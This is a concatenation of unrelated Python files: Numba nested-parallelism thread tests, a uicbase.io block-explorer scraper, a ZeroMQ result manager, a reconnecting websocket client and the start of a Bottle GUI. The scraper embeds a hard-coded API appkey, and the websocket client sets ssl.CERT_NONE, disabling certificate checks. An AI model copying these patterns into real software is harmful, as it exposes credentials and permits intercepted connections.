            out = np.zeros((1,), dtype=np.int64)
            test_gufunc(x, out)
            self.check_mask(mask, out)
            self.check_mask(mask, len(np.unique(x)))
    # this test can only run on OpenMP (providing OMP_MAX_ACTIVE_LEVELS is not
    # set or >= 2) and TBB backends
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_nested_parallelism_1(self):
        if threading_layer() == 'workqueue':
            self.skipTest("workqueue is not threadsafe")
        # check that get_num_threads is ok in nesting
        mask = config.NUMBA_NUM_THREADS - 1
        N = config.NUMBA_NUM_THREADS
        M = 2 * config.NUMBA_NUM_THREADS
        @njit(parallel=True)
        def child_func(buf, fid):
            M, N = buf.shape
            for i in prange(N):
                buf[fid, i] = get_num_threads()
        def get_test(test_type):
            if test_type == 'njit':
                def test_func(nthreads, py_func=False):
                    @njit(parallel=True)
                    def _test_func(nthreads):
                        acc = 0
                        buf = np.zeros((M, N))
                        set_num_threads(nthreads)
                        for i in prange(M):
                            local_mask = 1 + i % mask
                            # set threads in parent function
                            set_num_threads(local_mask)
                            if local_mask < N:
                                child_func(buf, local_mask)
                            acc += get_num_threads()
                        return acc, buf
                    if py_func:
                        return _test_func.py_func(nthreads)
                    else:
                        return _test_func(nthreads)
            elif test_type == 'guvectorize':
                def test_func(nthreads, py_func=False):
                    def _test_func(acc, buf, local_mask):
                        set_num_threads(nthreads)
                        # set threads in parent function
                        set_num_threads(local_mask[0])
                        if local_mask[0] < N:
                            child_func(buf, local_mask[0])
                        acc[0] += get_num_threads()
                    buf = np.zeros((M, N), dtype=np.int64)
                    acc = np.zeros((M, 1), dtype=np.int64)
                    local_mask = (1 + np.arange(M) % mask).reshape((M, 1))
                    sig = ['void(int64[:], int64[:, :], int64[:])']
                    layout = '(p), (n, m), (p)'
                    if not py_func:
                        _test_func = guvectorize(sig, layout, nopython=True,
                                                 target='parallel')(_test_func)
                    else:
                        _test_func = guvectorize(sig, layout,
                                                 forceobj=True)(_test_func)
                    _test_func(acc, buf, local_mask)
                    return acc, buf
            return test_func
        for test_type in ['njit', 'guvectorize']:
            test_func = get_test(test_type)
            got_acc, got_arr = test_func(mask)
            exp_acc, exp_arr = test_func(mask, py_func=True)
            np.testing.assert_equal(exp_acc, got_acc)
            np.testing.assert_equal(exp_arr, got_arr)
            # check the maths reconciles, guvectorize does not reduce, njit does
            math_acc_exp = 1 + np.arange(M) % mask
            if test_type == 'guvectorize':
                math_acc = math_acc_exp.reshape((M, 1))
            else:
                math_acc = np.sum(math_acc_exp)
            np.testing.assert_equal(math_acc, got_acc)
            math_arr = np.zeros((M, N))
            for i in range(1, N):
                # there's branches on 1, ..., num_threads - 1
                math_arr[i, :] = i
            np.testing.assert_equal(math_arr, got_arr)
    # this test can only run on OpenMP (providing OMP_MAX_ACTIVE_LEVELS is not
    # set or >= 2) and TBB backends
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_nested_parallelism_2(self):
        if threading_layer() == 'workqueue':
            self.skipTest("workqueue is not threadsafe")
        # check that get_num_threads is ok in nesting
        N = config.NUMBA_NUM_THREADS + 1
        M = 4 * config.NUMBA_NUM_THREADS + 1
        def get_impl(child_type, test_type):
            if child_type == 'parallel':
                child_dec = njit(parallel=True)
            elif child_type == 'njit':
                child_dec = njit(parallel=False)
            elif child_type == 'none':
                def child_dec(x):
                    return x
            @child_dec
            def child(buf, fid):
                M, N = buf.shape
                set_num_threads(fid)  # set threads in child function
                for i in prange(N):
                    buf[fid, i] = get_num_threads()
            if test_type in ['parallel', 'njit', 'none']:
                if test_type == 'parallel':
                    test_dec = njit(parallel=True)
                elif test_type == 'njit':
                    test_dec = njit(parallel=False)
                elif test_type == 'none':
                    def test_dec(x):
                        return x
                @test_dec
                def test_func(nthreads):
                    buf = np.zeros((M, N))
                    set_num_threads(nthreads)
                    for i in prange(M):
                        local_mask = 1 + i % mask
                        # when the threads exit the child functions they should
                        # have a TLS slot value of the local mask as it was set
                        # in child
                        if local_mask < config.NUMBA_NUM_THREADS:
                            child(buf, local_mask)
                            assert get_num_threads() == local_mask
                    return buf
            else:
                if test_type == 'guvectorize':
                    test_dec = guvectorize(['int64[:,:], int64[:]'],
                                           '(n, m), (k)', nopython=True,
                                           target='parallel')
                elif test_type == 'guvectorize-obj':
                    test_dec = guvectorize(['int64[:,:], int64[:]'],
                                           '(n, m), (k)', forceobj=True)
                def test_func(nthreads):
                    @test_dec
                    def _test_func(buf, local_mask):
                        set_num_threads(nthreads)
                        # when the threads exit the child functions they should
                        # have a TLS slot value of the local mask as it was set
                        # in child
                        if local_mask[0] < config.NUMBA_NUM_THREADS:
                            child(buf, local_mask[0])
                            assert get_num_threads() == local_mask[0]
                    buf = np.zeros((M, N), dtype=np.int64)
                    local_mask = (1 + np.arange(M) % mask).reshape((M, 1))
                    _test_func(buf, local_mask)
                    return buf
            return test_func
        mask = config.NUMBA_NUM_THREADS - 1
        res_arrays = {}
        for test_type in ['parallel', 'njit', 'none',
                          'guvectorize', 'guvectorize-obj']:
            for child_type in ['parallel', 'njit', 'none']:
                if child_type == 'none' and test_type != 'none':
                    continue
                set_num_threads(mask)
                res_arrays[test_type, child_type] = get_impl(
                    child_type, test_type)(mask)
        py_arr = res_arrays['none', 'none']
        for arr in res_arrays.values():
            np.testing.assert_equal(arr, py_arr)
        # check the maths reconciles
        math_arr = np.zeros((M, N))
        # there's branches on modulo mask but only NUMBA_NUM_THREADS funcs
        for i in range(1, config.NUMBA_NUM_THREADS):
            math_arr[i, :] = i
        np.testing.assert_equal(math_arr, py_arr)
    # this test can only run on OpenMP (providing OMP_MAX_ACTIVE_LEVELS is not
    # set or >= 2) and TBB backends
    # This test needs at least 3 threads to run, N>=2 for the launch, M>=N+1 for
    # the nested function
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 3, "Not enough CPU cores")
    def _test_nested_parallelism_3(self):
        if threading_layer() == 'workqueue':
            self.skipTest("workqueue is not threadsafe")
        # check that the right number of threads are present in nesting
        # this relies on there being a load of cores present
        BIG = 1000000
        @njit(parallel=True)
        def work(local_nt):  # arg is value 3
            tid = np.zeros(BIG)
            acc = 0
            set_num_threads(local_nt)  # set to 3 threads
            for i in prange(BIG):
                acc += 1
                tid[i] = _get_thread_id()
            return acc, np.unique(tid)
        @njit(parallel=True)
        def test_func_jit(nthreads):
            set_num_threads(nthreads)  # set to 2 threads
            lens = np.zeros(nthreads)
            total = 0
            for i in prange(nthreads):
                my_acc, tids = work(nthreads + 1)  # call with value 3
                lens[i] = len(tids)
                total += my_acc
            return total, np.unique(lens)
        NT = 2
        expected_acc = BIG * NT
        expected_thread_count = NT + 1
        got_acc, got_tc = test_func_jit(NT)
        self.assertEqual(expected_acc, got_acc)
        self.check_mask(expected_thread_count, got_tc)
        def test_guvectorize(nthreads):
            @guvectorize(['int64[:], int64[:]'],
                         '(n), (n)',
                         nopython=True,
                         target='parallel')
            def test_func_guvectorize(total, lens):
                my_acc, tids = work(nthreads + 1)
                lens[0] = len(tids)
                total[0] += my_acc
            total = np.zeros((nthreads, 1), dtype=np.int64)
            lens = np.zeros(nthreads, dtype=np.int64).reshape((nthreads, 1))
            test_func_guvectorize(total, lens)
            # vectorize does not reduce, so total is summed
            return total.sum(), np.unique(lens)
        got_acc, got_tc = test_guvectorize(NT)
        self.assertEqual(expected_acc, got_acc)
        self.check_mask(expected_thread_count, got_tc)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    @unittest.skipIf(not sys.platform.startswith('linux'), "Linux only")
    def _test_threadmask_across_fork(self):
        forkctx = multiprocessing.get_context('fork')
        @njit
        def foo():
            return get_num_threads()
        def wrap(queue):
            queue.put(foo())
        mask = 1
        self.assertEqual(foo(), config.NUMBA_NUM_THREADS)
        set_num_threads(mask)
        self.assertEqual(foo(), mask)
        shared_queue = forkctx.Queue()
        # check TLS slot inheritance in fork
        p = forkctx.Process(target=wrap, args=(shared_queue,))
        p.start()
        p.join()
        self.assertEqual(shared_queue.get(), mask)
    def tearDown(self):
        """Restore the maximum thread count so tests do not leak state."""
        set_num_threads(config.NUMBA_NUM_THREADS)
class TestNumThreadsBackends(TestInSubprocess, TestCase):
    """Drives TestNumThreads._test_* methods in child processes.

    Each generated test sets NUMBA_THREADING_LAYER / NUMBA_NUM_THREADS in the
    child environment and inspects the child's unittest output.
    """
    _class = TestNumThreads
    _DEBUG = False
    # 1 is mainly here to ensure tests skip correctly
    num_threads = [i for i in [1, 2, 4, 8, 16] if i <= config.NUMBA_NUM_THREADS]
    def run_test_in_separate_process(self, test, threading_layer, num_threads):
        """Run *test* in a subprocess configured for the given backend/count."""
        env_copy = os.environ.copy()
        env_copy['NUMBA_THREADING_LAYER'] = str(threading_layer)
        env_copy['NUMBA_NUM_THREADS'] = str(num_threads)
        cmdline = [sys.executable, "-m", "numba.runtests", "-v", test]
        return self.run_cmd(cmdline, env_copy)
    @classmethod
    def _inject(cls, name, backend, backend_guard, num_threads):
        """Attach a generated test method for one (name, backend, count) combo."""
        themod = cls.__module__
        thecls = cls._class.__name__
        injected_method = '%s.%s.%s' % (themod, thecls, name)
        def test_template(self):
            o, e = self.run_test_in_separate_process(injected_method, backend,
                                                     num_threads)
            if self._DEBUG:
                print('stdout:\n "%s"\n stderr:\n "%s"' % (o, e))
            self.assertIn('OK', e)
            self.assertTrue('FAIL' not in e)
            self.assertTrue('ERROR' not in e)
            # Propagate a skip in the child process as a skip here.
            m = re.search(r"\.\.\. skipped '(.*?)'", e)
            if m:
                self.skipTest(m.group(1))
        injected_test = "%s_%s_%s_threads" % (name[1:], backend, num_threads)
        setattr(cls, injected_test,
                tag('long_running')(backend_guard(test_template)))
    @classmethod
    def generate(cls):
        """Inject one subprocess test per _test_* method x backend x count."""
        for name in cls._class.__dict__.copy():
            # Hoisted out of the inner loops: previously this check ran once
            # per (backend, num_threads) pair for every attribute name.
            if not name.startswith('_test_'):
                continue
            for backend, backend_guard in cls.backends.items():
                for num_threads in cls.num_threads:
                    cls._inject(name, backend, backend_guard, num_threads)
# Materialise the per-backend/per-thread-count subprocess tests at import time.
TestNumThreadsBackends.generate()
if __name__ == '__main__':
    unittest.main()
|
UIC_Spider.py | #coding:utf-8
from Html_Downloader import HtmlDownloader
from Html_Parser import HtmlParser
from Data_Output import DataOutput
import csv
from multiprocessing import Process
import time
class SpiderMan(object):
    """Incremental scraper for the uicbase.io block explorer.

    crawl() fetches block (mining) records, crawl_deal() fetches transaction
    records; both back up the existing CSV, download only rows newer than the
    backup's newest row, then append the backup back to the fresh file.
    """
    def __init__(self):
        # Collaborators: HTTP download, JSON parsing and CSV output helpers.
        self.downloader = HtmlDownloader()
        self.parser = HtmlParser()
        self.output = DataOutput()
    def crawl(self,filename):
        """Update *filename* with block records newer than the last backup."""
        # CSV header for the block data file.
        num = ["takeoff", "number", "timestamp", "hash",
               "parentHash", "author", "authorWalletId", "minerReward", "difficulty",
               "totalDifficulty", "nonce", "extraData", "udid", "lat", "lgt",
               "sha3Uncles", "transactionsRoot", "stateRoot", "miner", "size",
               "gasLimit", "gasUsed", "transactionsCount", "unclesCount"]
        # Back up the current file so already-downloaded rows are preserved.
        try:
            with open(filename, 'r') as fr1:
                fr_reader = csv.reader(fr1)
                with open('uicbase_old.csv', 'w', newline='') as fw_old:
                    fw_old_writer = csv.writer(fw_old)
                    fw_old_writer.writerows(fr_reader)
                    print('写入备份文件uicbase_old.csv')
        except Exception as e:
            print(e)
        # Read the newest block number recorded in the backup file.
        try:
            fr = open('uicbase_old.csv', 'r')
            fr_reader = csv.reader(fr)
            head_row = next(fr_reader)
            first_row = next(fr_reader)
            last_number = int(first_row[1])
            fr.close()
            print('last_number=%s' % last_number)
        except Exception as e:
            # No usable backup: fall back to a hard-coded starting block.
            last_number = 1189
            print(e)
            print('last_number=%s' % last_number)
        # Recreate the target file with just the header row.
        ff = open(filename, 'w', newline='')
        ff_writer = csv.writer(ff)
        ff_writer.writerow(num)
        ff.close()
        appkey='9d423c8509bba0591d8dc73521270674'
        page=1
        page_size=400
        root_url = 'http://explorer.uicbase.io/expApi/blocksInfo' \
                   '?appkey=%s' \
                   '&page=%s' \
                   '&pageSize=%s' % (appkey, page,page_size)
        rank_content = self.downloader.download(root_url)
        #print(rank_content)
        current_page=self.parser.parser_json_page(rank_content)
        #print(current_page)
        total_page=self.parser.parser_json_totallines(rank_content)
        # The API reports totals assuming pageSize 20; rescale for our pageSize.
        if page_size!=20:
            total_page = int(total_page/(total_page/page_size))
        print('total_page=%s'%total_page)
        #print('type')
        #print(type(total_page))
        # Build the request URL for each page and download newest-first.
        for page in range(total_page):
            page+=1
            try:
                #t = time.strftime("%Y%m%d%H%M%S3282", time.localtime())
                root_url = 'http://explorer.uicbase.io/expApi/blocksInfo' \
                           '?appkey=%s' \
                           '&page=%s' \
                           '&pageSize=400' % (appkey,page)
                rank_content = self.downloader.download(root_url)
                if rank_content !=None:
                    #print(rank_content)
                    nums=self.parser.parser_json_datum(rank_content)
                    #print(nums[-1])
                    print('挖矿写入第:%s页'%page)
                    # NOTE(review): assumes row[1] (block number) from the parser
                    # is comparable with int last_number — confirm parser types.
                    if nums[-1][1]>last_number:
                        #print('data_writerows')
                        self.output.data_writerows(filename, nums)
                    else:
                        # Page straddles the last backed-up block: write row by
                        # row and stop at the first already-known block.
                        #print('data_writerow')
                        done = False
                        for num in nums:
                            if num[1]>last_number:
                                self.output.data_writerow(filename,num)
                            else:
                                print('挖矿数据下载完成')
                                done = True
                                break
                        if done == True:
                            break
                else:
                    #return False
                    pass
            except Exception as e:
                print(e)
                return False
        # Append the backed-up rows (minus header) after the fresh rows.
        try:
            fw = open(filename, 'a', newline='')
            fw_writer = csv.writer(fw)
            fr = open('uicbase_old.csv', 'r')
            reader = csv.reader(fr)
            next(reader)
            fw_writer.writerows(reader)
            fr.close()
            fw.close()
        except Exception as e:
            print(e)
    def crawl_deal(self,filename):
        """Update *filename* with transactions newer than the last backup."""
        # CSV header for the transaction data file.
        num = ["blockNumber", "txhash", "timestamp", "from", "to", "value", "fee",
               "nonce", "data", "fromWalletId", "toWalletId", "gas", "gasPrice"]
        # Back up the current file so already-downloaded rows are preserved.
        try:
            with open(filename, 'r') as fr1:
                fr_reader = csv.reader(fr1)
                with open('uicbase_deal_old.csv', 'w', newline='') as fw_old:
                    fw_old_writer = csv.writer(fw_old)
                    fw_old_writer.writerows(fr_reader)
                    print('写入备份文件uicbase_deal_old.csv')
        except Exception as e:
            print(e)
        # Read the most recent timestamp recorded in the backup file.
        try:
            fr = open('uicbase_deal_old.csv', 'r')
            fr_reader = csv.reader(fr)
            head_row = next(fr_reader)
            first_row = next(fr_reader)
            fr.close()
            #print('type(first_row[2])=%s'%type(first_row[2]))
            last_time = int(first_row[2])
            #print('old_deal_last_time=%s' % last_time)
        except Exception as e:
            # No usable backup: fall back to a hard-coded epoch timestamp.
            last_time = 1522029555
            print(e)
        print('deal_last_time=%s' % last_time)
        # Recreate the target file with just the header row.
        ff = open(filename, 'w', newline='')
        ff_writer = csv.writer(ff)
        ff_writer.writerow(num)
        ff.close()
        page =1
        pageSize=200
        root_url = 'http://explorer.uicbase.io/expApi/txsInfo' \
                   '?appkey=9d423c8509bba0591d8dc73521270674' \
                   '&page=%s' \
                   '&pageSize=%s' \
                   '&blockNumber=NaN'%(page,pageSize)
        deal_content=self.downloader.download(root_url)
        #current_page = self.parser.parser_json_deal_page(deal_content)
        # print(current_page)
        total_page = self.parser.parser_json_deal_totallines(deal_content)
        # The API reports totals assuming pageSize 20; rescale for our pageSize.
        if pageSize!=20:
            total_page = int(total_page/(total_page/pageSize))
        print('deal_total_page=%s' % total_page)
        for page in range(total_page):
            page += 1
            try:
                root_url = 'http://explorer.uicbase.io/expApi/txsInfo' \
                           '?appkey=9d423c8509bba0591d8dc73521270674' \
                           '&page=%s' \
                           '&pageSize=%s' \
                           '&blockNumber=NaN' % (page, pageSize)
                deal_content = self.downloader.download(root_url)
                if deal_content!=None:
                    # print(rank_content)
                    nums = self.parser.parser_json_deal_datum(deal_content)
                    #print(nums[-1][2])
                    print('交易数据写入第:%s页' % page)
                    if nums[-1]!=None:
                        #print(type(nums[-1][2]))
                        #print(type(last_time))
                        # NOTE(review): assumes row[2] (timestamp) from the parser
                        # is comparable with int last_time — confirm parser types.
                        if nums[-1][2] > last_time:
                            #print('data_writerows')
                            self.output.data_writerows(filename, nums)
                        else:
                            # Page straddles the last backed-up transaction:
                            # write row by row and stop at the first known one.
                            #print('data_writerow')
                            done=False
                            for num in nums:
                                if num[2] > last_time:
                                    self.output.data_writerow(filename, num)
                                else:
                                    print('deal数据下载完成')
                                    done=True
                                    break
                            if done==True:
                                break
                    else:
                        print('nums[-1]=%s'%nums[-1][2])
                else:
                    pass
            except Exception as e:
                print('crawl_deal:%s'%e)
                return False
        # Append the backed-up rows (minus header) after the fresh rows.
        try:
            fw = open(filename, 'a', newline='')
            fw_writer = csv.writer(fw)
            fr = open('uicbase_deal_old.csv', 'r')
            reader = csv.reader(fr)
            next(reader)
            fw_writer.writerows(reader)
            fr.close()
            fw.close()
        except Exception as e:
            print(e)
if __name__=='__main__':
    # Run the block crawl and the transaction crawl in parallel processes.
    spider_man = SpiderMan()
    filename = '挖矿数据.csv'
    filename_deal ='交易数据.csv'
    #spider_man.crawl_deal(filename_deal)
    #spider_man.crawl(filename)
    # BUG FIX: both processes were bound to the same variable P, so the first
    # handle was lost and only the second process was ever joined. Keep a
    # handle per process and join both before printing END.
    p_crawl = Process(target= spider_man.crawl,args=(filename,))
    print('P1 will start')
    p_crawl.start()
    p_deal = Process(target= spider_man.crawl_deal,args=(filename_deal,))
    print('P2 will start')
    p_deal.start()
    p_crawl.join()
    p_deal.join()
    print('---------END----------')
|
cache_result_manager.py | #!/usr/bin/python
import sys
import zmq
import time
import signal
import optparse
from multiprocessing import Process
# The "results_manager" function receives each result from multiple workers,
# and prints those results. When all results have been received, it signals
# the worker processes to shut down.
def result_manager(tm_between_msgs, wake_poll, result_server, ventilator_server, v_rm_port, rm_ports):
    """Receive worker results over ZeroMQ and shut workers down when done.

    Pulls results on rm_ports[0], subscribes to the ventilator's expected
    message count on v_rm_port, and publishes 'FINISHED' on rm_ports[1] when
    all results arrived or after tm_between_msgs idle seconds (SIGALRM).

    BUG FIX: three messages were written as print("fmt %d") % (args), which
    applies % to print()'s None return value and raised TypeError whenever
    they executed; the % formatting now happens inside the call. The Python-2
    print statement was also converted to a function call.
    """
    # Initialize a zeromq context
    context = zmq.Context()
    # Set up a channel to receive results
    results_receiver = context.socket(zmq.PULL)
    results_receiver.bind("tcp://%s:%d" % (result_server, rm_ports[0]))
    # Set up a channel to receive ventilator messages over
    v_receiver = context.socket(zmq.SUB)
    v_receiver.connect("tcp://%s:%d" % (ventilator_server, v_rm_port))
    v_receiver.setsockopt(zmq.SUBSCRIBE, "")
    # Set up a channel to send control commands
    control_sender = context.socket(zmq.PUB)
    control_sender.bind("tcp://%s:%d" % (result_server, rm_ports[1]))
    # Set up a poller to multiplex the results_receiver and v_receiver channels
    poller = zmq.Poller()
    poller.register(results_receiver, zmq.POLLIN)
    poller.register(v_receiver, zmq.POLLIN)
    last_msg_tm = time.time()
    msg_cnt = 0
    v_message = None
    # Time check failsafe... If we don't get a message in X seconds, we finish up.
    def wake_handler(signum, frame):
        tm_diff = time.time() - last_msg_tm
        print("Time Diff %d" % tm_diff)
        if tm_diff >= tm_between_msgs:
            print("Result Manager timed out after %d seconds waiting for messages!" % tm_diff)
            # Signal to all workers that we are finsihed
            control_sender.send("FINISHED")
            time.sleep(5)
            sys.exit()
    # Set the signal handler
    signal.signal(signal.SIGALRM, wake_handler)
    # Write output to log file
    #f = open('result_manager.log', 'w')
    while True:
        socks = dict(poller.poll())
        if socks.get(results_receiver) == zmq.POLLIN:
            signal.alarm(0)  # May not actually need to clear the alarm, but I do
            result_message = results_receiver.recv_json()
            msg_cnt = msg_cnt + 1
            print("Worker %s:%s answered: %s message count: %d\n %s" % (result_message['worker'], result_message['host'], result_message['result'], msg_cnt, result_message['url']))
            #f.write("Worker %i answered: %i" % (result_message['worker'], result_message['result']))
            last_msg_tm = time.time()
            signal.alarm(wake_poll)
        # If a message came over the v_receiver channel get it.
        if socks.get(v_receiver) == zmq.POLLIN:
            signal.alarm(0)  # May not actually need to clear the alarm, but I do
            v_message = v_receiver.recv_json()
            print("Received %d count from ventilator current count is %d" % (v_message['count'], msg_cnt))
            signal.alarm(wake_poll)
        # if msg_cnt >= v_message count , break and shut down the workers.
        if v_message and msg_cnt >= v_message['count']:
            print("Result Manager received last message, quitting!")
            break
    # Signal to all workers that we are finsihed
    control_sender.send("FINISHED")
    #f.close()
    time.sleep(5)
if __name__ == "__main__":
    # Parse command-line options for the result-manager daemon.
    # BUGFIX: usage string said "VENTILATO_SERVER".
    parser = optparse.OptionParser('usage %prog -t TIME_BETWEEN_MESSAGES -w WAKE_ALARM -r RESULT_SERVER -v VENTILATOR_SERVER', add_help_option=True)
    parser.add_option('-t', '--tm-between-msgs', action="store", type="int", dest="tm_between_msgs", default=10, help="Idle time between messages before the result manager assumes its finished.")
    parser.add_option('-w', '--wake-alarm', action="store", type="int", dest="wake_poll", default=30, help="An alarm to wake the result server in case of unmatching message counts.")
    parser.add_option('-r', '--result-server', action="store", type="string", dest="result_server", help="Server where the worker results are sent.")
    parser.add_option('-v', '--ventilator-server', action="store", type="string", dest="ventilator_server", help="Server that queues the urls.")
    parser.add_option('-p', '--rm-ports', action="store", type="string", dest="rm_ports", default="5558:5559", help="Result Manager ports for worker communication.")
    parser.add_option('-c', '--v_rm-port', action="store", type="int", dest="v_rm_port", default=5560, help="Result Manager communication port.")
    (options, args) = parser.parse_args()
    tm_between_msgs = options.tm_between_msgs
    wake_poll = options.wake_poll
    result_server = options.result_server
    ventilator_server = options.ventilator_server
    # list() so rm_ports stays indexable (rm_ports[1] is used in
    # result_manager) on Python 3 as well, where map() is lazy.
    rm_ports = list(map(int, options.rm_ports.split(':')))
    v_rm_port = options.v_rm_port
    # Both server addresses are mandatory.
    if not (result_server and ventilator_server):
        print(parser.usage)
        sys.exit(1)
    # Fire up our result manager in a child process.
    # BUGFIX: the Process object used to be bound to the name
    # `result_manager`, shadowing the result_manager function.
    result_manager_process = Process(target=result_manager, args=(tm_between_msgs, wake_poll, result_server, ventilator_server, v_rm_port, rm_ports))
    result_manager_process.start()
|
websocket_client.py | import json
import logging
import socket
import ssl
import sys
import traceback
from datetime import datetime
from threading import Lock, Thread
from time import sleep
from typing import Optional
import websocket
from quantitativetrader.trader.utility import get_file_logger
class WebsocketClient:
    """
    Websocket API client with automatic reconnection.

    After creating the client object, use start() to run the worker and ping
    threads. The worker thread connects the websocket automatically and
    reconnects after a disconnect.

    Use stop() to stop the threads and disconnect the websocket before
    destroying the client object (especially when exiting the programme).

    Default serialization format is json.

    Callbacks to override:
    * unpack_data
    * on_connected
    * on_disconnected
    * on_packet
    * on_error

    After start() is called, the ping thread pings the server every
    ping_interval (default 60) seconds.

    If you want to send anything other than JSON, override send_packet.
    """
    def __init__(self):
        """Constructor"""
        self.host = None  # ws(s):// url; set by init()
        self._ws_lock = Lock()  # guards creation/teardown of self._ws
        self._ws = None  # active websocket connection, or None
        self._worker_thread = None
        self._ping_thread = None
        self._active = False  # cleared by stop(); ends both thread loops
        self.proxy_host = None
        self.proxy_port = None
        self.ping_interval = 60  # seconds
        self.header = {}  # extra HTTP headers for the handshake
        self.logger: Optional[logging.Logger] = None
        # For debugging: last payloads, truncated to 1000 chars on record.
        self._last_sent_text = None
        self._last_received_text = None
    def init(self,
             host: str,
             proxy_host: str = "",
             proxy_port: int = 0,
             ping_interval: int = 60,
             header: dict = None,
             log_path: Optional[str] = None,
             ):
        """
        Configure the client; call before start().

        :param host: websocket url to connect to
        :param proxy_host: HTTP proxy host (only used together with proxy_port)
        :param proxy_port: HTTP proxy port
        :param header: optional dict of extra handshake headers
        :param ping_interval: unit: seconds, type: int
        :param log_path: optional. file to save log.
        """
        self.host = host
        self.ping_interval = ping_interval  # seconds
        if log_path is not None:
            self.logger = get_file_logger(log_path)
            self.logger.setLevel(logging.DEBUG)
        if header:
            self.header = header
        if proxy_host and proxy_port:
            self.proxy_host = proxy_host
            self.proxy_port = proxy_port
    def start(self):
        """
        Start the client; on_connected is called after the websocket
        is connected successfully.

        Please don't send packets until the on_connected function is called.
        """
        self._active = True
        self._worker_thread = Thread(target=self._run)
        self._worker_thread.start()
        self._ping_thread = Thread(target=self._run_ping)
        self._ping_thread.start()
    def stop(self):
        """
        Stop the client: clear the active flag (ending both thread loops)
        and disconnect the websocket.
        """
        self._active = False
        self._disconnect()
    def join(self):
        """
        Wait till all threads finish.

        This function cannot be called from worker thread or callback function.
        """
        self._ping_thread.join()
        self._worker_thread.join()
    def send_packet(self, packet: dict):
        """
        Send a packet (dict data) to server as JSON text.

        Override this if you want to send a non-json packet.
        """
        text = json.dumps(packet)
        self._record_last_sent_text(text)
        return self._send_text(text)
    def _log(self, msg, *args):
        # Debug-log only when a logger was configured via init(log_path=...).
        logger = self.logger
        if logger:
            logger.debug(msg, *args)
    def _send_text(self, text: str):
        """
        Send a text string to server. Silently a no-op when not connected.
        """
        ws = self._ws
        if ws:
            ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
            self._log('sent text: %s', text)
    def _send_binary(self, data: bytes):
        """
        Send bytes data to server. Silently a no-op when not connected.
        """
        ws = self._ws
        if ws:
            # NOTE(review): this calls the underscore-prefixed
            # WebSocket._send_binary; the public websocket-client API is
            # send_binary() — confirm against the pinned library version.
            ws._send_binary(data)
            self._log('sent binary: %s', data)
    def _create_connection(self, *args, **kwargs):
        """Create and return a raw websocket connection."""
        return websocket.create_connection(*args, **kwargs)
    def _ensure_connection(self):
        """Connect under the lock if not yet connected; fire on_connected
        (outside the lock) only when this call created the connection."""
        triggered = False
        with self._ws_lock:
            if self._ws is None:
                self._ws = self._create_connection(
                    self.host,
                    # NOTE(review): CERT_NONE disables TLS certificate
                    # verification for this connection.
                    sslopt={"cert_reqs": ssl.CERT_NONE},
                    http_proxy_host=self.proxy_host,
                    http_proxy_port=self.proxy_port,
                    header=self.header
                )
                triggered = True
        if triggered:
            self.on_connected()
    def _disconnect(self):
        """
        Detach and close the websocket (if any) and fire on_disconnected.
        Safe to call when already disconnected.
        """
        triggered = False
        with self._ws_lock:
            if self._ws:
                ws: websocket.WebSocket = self._ws
                self._ws = None
                triggered = True
        if triggered:
            # close() and the callback run after the lock is released
            ws.close()
            self.on_disconnected()
    def _run(self):
        """
        Worker loop: keep receiving (and reconnecting) till stop is called.
        """
        try:
            while self._active:
                try:
                    self._ensure_connection()
                    ws = self._ws
                    if ws:
                        text = ws.recv()
                        # ws object is closed when recv function is blocking
                        if not text:
                            self._disconnect()
                            continue
                        self._record_last_received_text(text)
                        try:
                            data = self.unpack_data(text)
                        except ValueError as e:
                            print("websocket unable to parse data: " + text)
                            raise e
                        self._log('recv data: %s', data)
                        self.on_packet(data)
                # ws is closed before recv function is called
                # For socket.error, see Issue #1608
                except (
                    websocket.WebSocketConnectionClosedException,
                    websocket.WebSocketBadStatusException,
                    socket.error
                ):
                    self._disconnect()
                # other internal exception raised in on_packet
                except:  # noqa
                    et, ev, tb = sys.exc_info()
                    self.on_error(et, ev, tb)
                    self._disconnect()
        except:  # noqa
            et, ev, tb = sys.exc_info()
            self.on_error(et, ev, tb)
            self._disconnect()
    @staticmethod
    def unpack_data(data: str):
        """
        Default serialization format is json.

        Override this method if you want to use another serialization format.
        """
        return json.loads(data)
    def _run_ping(self):
        """Ping loop: ping the server, then sleep ping_interval seconds
        in 1-second steps so stop() is noticed promptly."""
        while self._active:
            try:
                self._ping()
            except:  # noqa
                et, ev, tb = sys.exc_info()
                self.on_error(et, ev, tb)
                # self._run() will reconnect websocket
                sleep(1)
            for i in range(self.ping_interval):
                if not self._active:
                    break
                sleep(1)
    def _ping(self):
        """Send a websocket PING control frame (no-op when not connected)."""
        ws = self._ws
        if ws:
            ws.send("ping", websocket.ABNF.OPCODE_PING)
    @staticmethod
    def on_connected():
        """
        Callback when websocket is connected successfully.
        """
        pass
    @staticmethod
    def on_disconnected():
        """
        Callback when websocket connection is lost.
        """
        pass
    @staticmethod
    def on_packet(packet: dict):
        """
        Callback when receiving data from server.
        """
        pass
    def on_error(self, exception_type: type, exception_value: Exception, tb):
        """
        Callback when an exception is raised: write the detailed report to
        stderr, then delegate to sys.excepthook.
        """
        sys.stderr.write(
            self.exception_detail(exception_type, exception_value, tb)
        )
        return sys.excepthook(exception_type, exception_value, tb)
    def exception_detail(
        self, exception_type: type, exception_value: Exception, tb
    ):
        """
        Build a detailed exception report including the last sent/received
        payloads and the formatted traceback.
        """
        text = "[{}]: Unhandled WebSocket Error:{}\n".format(
            datetime.now().isoformat(), exception_type
        )
        text += "LastSentText:\n{}\n".format(self._last_sent_text)
        text += "LastReceivedText:\n{}\n".format(self._last_received_text)
        text += "Exception trace: \n"
        text += "".join(
            traceback.format_exception(exception_type, exception_value, tb)
        )
        return text
    def _record_last_sent_text(self, text: str):
        """
        Record last sent text (truncated to 1000 chars) for debug purposes.
        """
        self._last_sent_text = text[:1000]
    def _record_last_received_text(self, text: str):
        """
        Record last received text (truncated to 1000 chars) for debug purposes.
        """
        self._last_received_text = text[:1000]
|
gui.py | #!/usr/bin/python3
import json
import os
import threading
import time
import textwrap
import subprocess
from bottle import Bottle
from bottle import redirect
from bottle import template
from bottle import TEMPLATE_PATH
from bottle import request
from bottle import response
from distutils.util import strtobool
from queue import Queue
